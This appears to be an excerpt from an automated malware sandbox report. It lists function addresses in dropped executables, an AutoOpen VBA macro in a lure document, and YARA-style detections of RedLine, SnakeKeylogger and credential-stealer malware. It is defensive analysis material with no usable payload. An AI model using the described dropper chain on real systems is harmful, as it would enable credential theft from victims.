          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94F6388_2_2C94F638
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9492388_2_2C949238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94C4388_2_2C94C438
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94E0588_2_2C94E058
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C947C588_2_2C947C58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94AE588_2_2C94AE58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9400408_2_2C940040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94FC788_2_2C94FC78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94CA788_2_2C94CA78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9498788_2_2C949878
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94FC688_2_2C94FC68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94CD988_2_2C94CD98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C949B988_2_2C949B98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9485B88_2_2C9485B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94E9B88_2_2C94E9B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94B7B88_2_2C94B7B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9409D08_2_2C9409D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94A1D88_2_2C94A1D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94D3D88_2_2C94D3D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9409C38_2_2C9409C3
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C948BF88_2_2C948BF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94BDF88_2_2C94BDF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94F3188_2_2C94F318
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94C1188_2_2C94C118
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C948F188_2_2C948F18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9405088_2_2C940508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94DD388_2_2C94DD38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9479388_2_2C947938
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94AB388_2_2C94AB38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94F9588_2_2C94F958
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9495588_2_2C949558
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94C7588_2_2C94C758
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94E3788_2_2C94E378
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C947F788_2_2C947F78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94B1788_2_2C94B178
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95CA908_2_2C95CA90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9564408_2_2C956440
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9538808_2_2C953880
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9506808_2_2C950680
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9554A08_2_2C9554A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9522A08_2_2C9522A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C953EC08_2_2C953EC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C950CC08_2_2C950CC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C955AE08_2_2C955AE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9528E08_2_2C9528E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95F4188_2_2C95F418
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9500068_2_2C950006
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C952C008_2_2C952C00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C955E008_2_2C955E00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9548208_2_2C954820
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9516208_2_2C951620
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95F4288_2_2C95F428
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9532408_2_2C953240
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9500408_2_2C950040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C954E608_2_2C954E60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C951C608_2_2C951C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9551808_2_2C955180
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C951F808_2_2C951F80
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C953BA08_2_2C953BA0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9509A08_2_2C9509A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9557C08_2_2C9557C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9525C08_2_2C9525C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95E1C88_2_2C95E1C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9541E08_2_2C9541E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C950FE08_2_2C950FE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9545008_2_2C954500
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9513008_2_2C951300
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9561208_2_2C956120
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C952F208_2_2C952F20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C954B408_2_2C954B40
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9519408_2_2C951940
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95034F8_2_2C95034F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9535608_2_2C953560
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9503608_2_2C950360
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C962DB08_2_2C962DB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C960AB88_2_2C960AB8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9626B08_2_2C9626B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9603B88_2_2C9603B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C961FB08_2_2C961FB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9618B08_2_2C9618B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9636898_2_2C963689
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9651928_2_2C965192
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9611B08_2_2C9611B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C962DA18_2_2C962DA1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C960AA88_2_2C960AA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9626A28_2_2C9626A2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C96003B8_2_2C96003B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9600408_2_2C960040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9603A88_2_2C9603A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C961FA18_2_2C961FA1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9618A28_2_2C9618A2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9611A08_2_2C9611A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D02C0118_2_2D02C011
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D02524B8_2_2D02524B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D0252588_2_2D025258
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D0232AC8_2_2D0232AC
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00408C608_1_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0040DC118_1_0040DC11
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00407C3F8_1_00407C3F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00418CCC8_1_00418CCC
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00406CA08_1_00406CA0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004028B08_1_004028B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0041A4BE8_1_0041A4BE
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00408C608_1_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004182448_1_00418244
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004016508_1_00401650
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00402F208_1_00402F20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004193C48_1_004193C4
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004187888_1_00418788
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00402F898_1_00402F89
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00402B908_1_00402B90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004073A08_1_004073A0
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027D20C411_2_027D20C4
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00408C6014_2_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040DC1114_2_0040DC11
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00407C3F14_2_00407C3F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00418CCC14_2_00418CCC
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00406CA014_2_00406CA0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004028B014_2_004028B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0041A4BE14_2_0041A4BE
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00408C6014_2_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0041824414_2_00418244
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040165014_2_00401650
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00402F2014_2_00402F20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004193C414_2_004193C4
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0041878814_2_00418788
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00402F8914_2_00402F89
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00402B9014_2_00402B90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004073A014_2_004073A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF12C014_2_33EF12C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF12B014_2_33EF12B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF156014_2_33EF1560
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_33EF154F14_2_33EF154F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DB7A114_2_370DB7A1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DD49014_2_370DD490
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DB4BF14_2_370DB4BF
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DB1E114_2_370DB1E1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D41E114_2_370D41E1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DF0C914_2_370DF0C9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DAF0014_2_370DAF00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D8F1814_2_370D8F18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D5E5814_2_370D5E58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DBD5F14_2_370DBD5F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DAA5814_2_370DAA58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DBA8114_2_370DBA81
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DE5D814_2_370DE5D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DE5E814_2_370DE5E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DD48114_2_370DD481
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370D306814_2_370D3068
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_370DAC2014_2_370DAC20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819004014_2_38190040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819350814_2_38193508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819855014_2_38198550
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_38190E3814_2_38190E38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_38197A2814_2_38197A28
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819073814_2_38190738
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D83014_2_3819D830
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D84014_2_3819D840
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819707114_2_38197071
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819DC9814_2_3819DC98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819DC8814_2_3819DC88
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819708014_2_38197080
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381934F814_2_381934F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E0F014_2_3819E0F0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E0E114_2_3819E0E1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E53914_2_3819E539
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E54814_2_3819E548
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819854014_2_38198540
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B57414_2_3819B574
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E99114_2_3819E991
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B58014_2_3819B580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819E9A014_2_3819E9A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B9D814_2_3819B9D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819B9CA14_2_3819B9CA
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819EDF814_2_3819EDF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819EDE914_2_3819EDE9
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819BE3014_2_3819BE30
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_38190E2914_2_38190E29
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819BE2014_2_3819BE20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F25014_2_3819F250
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F24014_2_3819F240
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C27A14_2_3819C27A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F69A14_2_3819F69A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C28814_2_3819C288
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819F6A814_2_3819F6A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C6D014_2_3819C6D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819FAF014_2_3819FAF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819C6E014_2_3819C6E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819FB0014_2_3819FB00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CB3814_2_3819CB38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819072A14_2_3819072A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CB2A14_2_3819CB2A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CF9014_2_3819CF90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819CF8014_2_3819CF80
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D3DA14_2_3819D3DA
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_3819D3E814_2_3819D3E8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381A6C1814_2_381A6C18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381A58B814_2_381A58B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_381A7AF014_2_381A7AF0
          Source: PI ITS15235.docOLE, VBA macro line: Sub AutoOpen()
          Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
          Source: PI ITS15235.docOLE indicator, VBA macros: true
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\npratlsN.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: String function: 0040D606 appears 72 times
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: String function: 0040E1D8 appears 129 times
          Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 029046A4 appears 244 times
          Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 029044D0 appears 33 times
          Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 0290480C appears 931 times
          Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 029044AC appears 74 times
          Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 0291881C appears 45 times
          Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 02918798 appears 54 times
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: String function: 027E8798 appears 48 times
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: String function: 027D480C appears 619 times
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: String function: 027D46A4 appears 154 times
          Source: 14.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 14.1.npratlsN.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 4.2.brightness.exe.217d67a8.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 14.1.npratlsN.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 4.2.brightness.exe.218133d8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
